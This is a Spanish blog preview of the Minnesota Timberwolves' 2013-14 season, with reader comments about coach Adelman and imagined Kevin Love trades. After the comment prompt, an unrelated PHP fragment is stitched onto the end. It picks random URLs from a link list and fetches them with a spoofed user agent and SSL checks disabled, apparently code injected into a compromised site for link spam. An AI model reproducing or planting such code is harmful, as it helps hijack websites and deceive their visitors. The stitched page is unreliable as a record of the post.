Minnesota Timberwolves: Cuestión de salud

23 de October de 2013 por Viva_Dirk

wolves2013

Desde que hace 2 temporadas Ricky Rubio aterrizara en los Wolves las expectativas del equipo se han disparado ya que Love, Pekovic y el propio Rubio forman un trío de jugadores de gran calidad en un momento perfecto de sus carreras para compenetrarse a la perfección y mejorar cada año, tanto de forma individual como colectiva. El problema es que rara vez hemos podido disfrutar de ellos juntos al 100% en una cancha de baloncesto. De los 148 partidos que han jugado los Wolves en estos años, Ricky ha jugado 98, Love 73 y Pekovic 109. No hemos tenido oportunidad de contemplar el nivel real de este bajo las órdenes de Rick Adelman porque rara vez han estado los 3 juntos al 100%, así que trataremos de intuirlo.

Como decíamos, Ricky Rubio es el base titular del equipo y esta temporada debe ser la de su explosión definitiva. No podemos quedarnos solo en su creatividad ofensiva y su capacidad para robar balones en defensa. Si Ricky quiere ser alguien importante debe mejorar en todo los demás, sus porcentajes son muy malos y sus puntos pocos. Personalmente no tengo duda alguna de que si está bien físicamente vamos a disfrutar de un temporadón por su parte. JJ Barea es opuesto a Ricky. Como anotador contrastado y tirador fiable es un gran recambio y pueden coincidir en cancha sin problemas. Alexey Shved cuajó un buen año rookie como combo guard y esta seguirá siendo su función. Deberá mejorar su selección de tiro y desgastarse más en defensa si no quiere perder muchos minutos en cancha. 

Un veterano como Kevin Martin ocupa el puesto de 2 titular.Tras su buen año en Oklahoma, su misión será la de aportar anotación exterior. De hecho será casi su único cometido y eso puede beneficiarle enormemente. El rookie Shabazz Muhammad tendrá a priori un gran papel para un jugador de sus características. Salir y lanzar mucho no le supondrá ningún problema porque es un auténtico chupón pero debería demostrar que puede hacer algo más que tirar con bajos porcentaje sin aportar en ningún otro aspecto. Una cosa es segura: mejora defensivamente a cualquiera de sus competidores por el puesto gracias a su físico. Si Muhammad ofrece un buen nivel se convertirá en otra pieza joven que sumar al proyecto, si no se sumará un problema a la plantilla visto su carácter.

Corey Brewer vuelve al equipo que lo seleccionó en el draft en el mejor momento de su carrera. El que fuera estrella universitaria es ahora un excelente complemento para cualquier plantilla. Excelente defensor tanto en el uno contra uno como en las lineas de pase, inteligente en ataque y capaz de encadenar buenas rachas anotadoras. El sexto hombre del equipo será Derrick Williams, un joven forward que no ha despejado aún ninguna de las dudas que se ciernen sobre él. Sabemos de su capacidad anotadora y su talento pero en una campaña en la que Kevin Love se perdió 60 partidos y Ricky Rubio le regaló decenas de canastas no le vimos rendir al nivel que se le supone a un nº2 del draft. Este año debe ofrecer soluciones en ataque e intensidad defensiva jugando los minutos de descanso de Love y como alero cuando sea necesario. Lo tiene todo para ser un hombre importante en la liga pero no nos ha demostrado casi nada. Dante Cunningham disfrutará de algunos minutos más debido a la nueva lesión de Chase Budinger.

La gran estrella del equipo debe recuperar las sensaciones que dejó antes de una temporada para olvida. Kevin Love es uno de esos hombres que podría disputarle el MVP a Lebron James y Kevin Durant. Si está recuperado físicamente estamos hablando del mejor ala-pívot de la competición, capaz de anotar desde cualquier posición del ataque, tanto de espaldas como de cara a la canasta, buen pasador y con el mejor instinto reboteador de todos los que habitan las zonas de la liga. Un Love al nivel de la temporada 11-12 es un espectáculo por si mismo y significarían playoffs casi seguros para los Wolves. Chris Johnson tendrá un papel testimonial.

El perfecto compañero para Love y Ricky es Nikola Pekovic, jugador productivo donde los haya, buen defensor en el poste y gran jugador de poste bajo, pívot clásico de los que no se ven con facilidad. El pick&roll con Ricky dará más de un quebradero de cabeza a los rivales, al igual que su uno contra uno en el poste bajo con Love esperando más allá de la línea de 3. El rookie Gorgui Dieng, a poco que demuestre, debería ganarle la partida a un Ronny Turiaf que salvo celebrar efusivamente las canastas no destaca por nada más. Dieng puede aportar la intimidación de la que carecen el resto de interiores.

A los mandos de la nave, Rick Adelman, un veterano y muy valorado entrenador que siempre ha sabido ganar muchos partidos durante la liga regular con sus equipos, y que en playoffs, por unas cosas o por otras, no ha cosechado ningún éxito reseñable. El caudal ofensivo del que dispone es grande y por ahí estamos seguros de que los Wolves son superiores a un buen puñado de equipos, pero las dudas de los físicos de Ricky y Pekovic, la falta de músculo en general del equipo y la poca capacidad de intimidación de la pareja interior titular dejan un gran trabajo a Adelman por delante si quiere formar un equipo realmente competitivo. Son muchas las incógnitas a despejar.

Quinteto: Ricky Rubio – Kevin Martin – Corey Brewer – Kevin Love – Nikola Pekovic
Sexto hombre: Derrick Williams

Pronóstico: Peleando playoffs. 42-48 victorias.

Comenta

12 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Ay, qué ganas de haber hecho el análisis de mis lobeznos!! Pero no ha podido ser, buen trabajo Viva!
    Aun que no estoy muy de acuerdo con eso de que Adelman no ha cosechado ningún éxito en Playoffs. Vale que no ha ganado un anillo pero llegó a las finales del 92 con Portland y perdió laa finales de conferencia del 2000 contra Lakers por un mal palmeo de Vlade que terminó en manos de ” Big shot Bob” Horry y bueno, historia conocida.

    Confío mucho en este equipo de hecho, son mi equipo de la liga.
    Love es un jugador de otra época que se ha puesto aún más en forma y se le ve rapidísimo. Le veo con un 25-15-4 tranquilamente.
    Pekovic es una maravilla debajo del aro, capaz de fabricarse su tiro con el cuerpo y con una ventaja añadida, mete los libres.

    Y qué voy a decir de Ricky…nunca será un tirador ni un anotador pero si sigue liderando como lidera y defendiendo como defiende ( no sólo por robos) a mí me tendrá como incondicional. Tiene que penetrar más y creo que lo hará.

    Equipo que apetece mucho

      Citar

  2. Viva_Dirk dice:
    #2

    Lo que digo de Adelman es similar a lo que dices tu. Después de 24 temporadas entrenando esos son sus logros, una final y una final de conferencia. Ha entrenado a muy buenos equipos pero no ha sido un entrenador de llegar lejos constantemente.

    Me gusta Adelman eh, de hecho con lo que hay hoy en la liga creo que es un top5 de entrenadores.

      Citar

  3. HisRoyalAirness dice:
    #3

    Yo creo que ha tenido muy mala suerte y un problema: Phil Jackson.
    De todos modos creo que ha tenido muy buenos equipos pero ni de lejos como sus rivales. Los Kings jugaban de vicio pero estrellas? Chris Webber y para de contar. Y Portland y L.A. en esa época tenían unos equipazos de locos.
    Y la época de Portland coincidió con MJ.
    La mala suerte definitiva había sido lo de Houston y las lesiones de T-Mac y Yao. Aún así llevaron a los Lakers a 7 partidos.
    Para mí un fuera de serie

      Citar

  4. franitis dice:
    #4

    Perdón por el “off-topic”, pero la foto de los tres con esas barbas así en plan “juguetones”… Parecen tres “gay-osos”, ¿no o qué? 🙂

      Citar

  5. r_miller dice:
    #5

    Creo que han tenido mucha mala suerte y este año tienes que estar en el top 10 de toda la NBA porque salvo, Miami, Chicago, Pacers i Spurs nadie les supera sobremanera. Kevin Love es un monstruo que tiene que ser MVP 20 veces si el equipo le acompanya.

      Citar

  6. GreenPride dice:
    #6

    Unod e los equipos a los que todos queremos ver jugar este año y rezamos porque esta vez sí la salud les acompañe. Están llamados a ser uno de los grandes animadores de la competición y si consiguen que sus puntales rindan al máximo pueden dar que hablar.
    Es una temporada decisiva para Ricky, que debe dar un paso más en liderazgo y anotación. Love se juega ver si se quedará en gran jugador o pasa a ser una de las verdaderas estrellas de la liga capaz de hacer que su equipo logre cotas altas y pelee por todo en PO.
    Lástimas la pérdida de Kirilenko pero deseando de ver a estos Wolves. Para mí, sin lesiones equipo de PO seguro.

      Citar

  7. Denise dice:
    #7

    En EEUU está apareciendo la noticia de que Kevin Love ha pedido el traspaso este verano para irse a Lakers ó a NY. Si no se lo dan, amenaza con marcharse el año que viene libre.
    Respecto a NY, salvo en un trade a 3-4 bandas, veo casi imposible cuadrar ese traspaso, respecto a Lakers…estoy pensando en un Gasol (via renovación 10 kilos y traspaso sign and trade) + este top 8 del Draft. que van a tener los Lakers + algún jugador joven tipo Henry ó Bazemore.

      Citar

  8. Nacho dice:
    #8

    Y Gasol aceptaría eso? Lo dudo. Si renueva es para jugar en Lakers. Para un trade a Minny firma con quien quiera.

      Citar

  9. Denise dice:
    #9

    Nacho:
    Y Gasol aceptaría eso? Lo dudo. Si renueva es para jugar en Lakers. Para un trade a Minny firma con quien quiera.

    jaja, ya pero afortunadamente, en la NBA los jugadores son mercancias y no tienen tanto poder como en el futbol, es decir, a Gasol le pueden renovar prometiendole lo que sea, y al dia siguiente lo empaquetan a algun lado.

      Citar

  10. Ruxixon dice:
    #10

    A 3 bandas Chicago,Minny y NYK.

    Chicago recibe a Carmelo
    Minny recibe a Boozer,Hardaway Jr.,una ronda futura de Bulls y los derechos de Mirotic
    NYK recibe a Love y Kevin Martin

    Para los Timberwolves interesante Hardaway y Mirotic de cara al futuro,con el expiring de Boozer,1 año y carretera.Chicago se haría con un S&T con Melo sin usar la amnistía en Boozer y NYK tendría su faro esperando a sacar de los libros los contratos de los Stoudemire & cia,

      Citar

  11. Denise dice:
    #11

    Ruxixon:
    A 3 bandas Chicago,Minny y NYK.

    Chicago recibe a Carmelo
    Minny recibe a Boozer,Hardaway Jr.,una ronda futura de Bulls y los derechos de Mirotic
    NYK recibe a Love y Kevin Martin

    Para los Timberwolves interesante Hardaway y Mirotic de cara al futuro,con el expiring de Boozer,1 año y carretera.Chicago se haría con un S&T con Melo sin usar la amnistía en Boozer y NYK tendría su faro esperando a sacar de los libros los contratos de los Stoudemire & cia,

    jaja, buen trade pero supongo que si Love quiere ir a NY, es para jugar con Melo. Aun así, que tito Phil vaya tomando nota.

      Citar

  12. Jose Luis dice:
    #12

    Denise: jaja, ya pero afortunadamente, en la NBA los jugadores son mercancias y no tienen tanto poder como en el futbol, es decir, a Gasol le pueden renovar prometiendole lo que sea, y al dia siguiente lo empaquetan a algun lado.

    Pero eso es demasiado feo Denise. Es decir, son mercancías, pero yo esto no lo he visto en la NBA.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>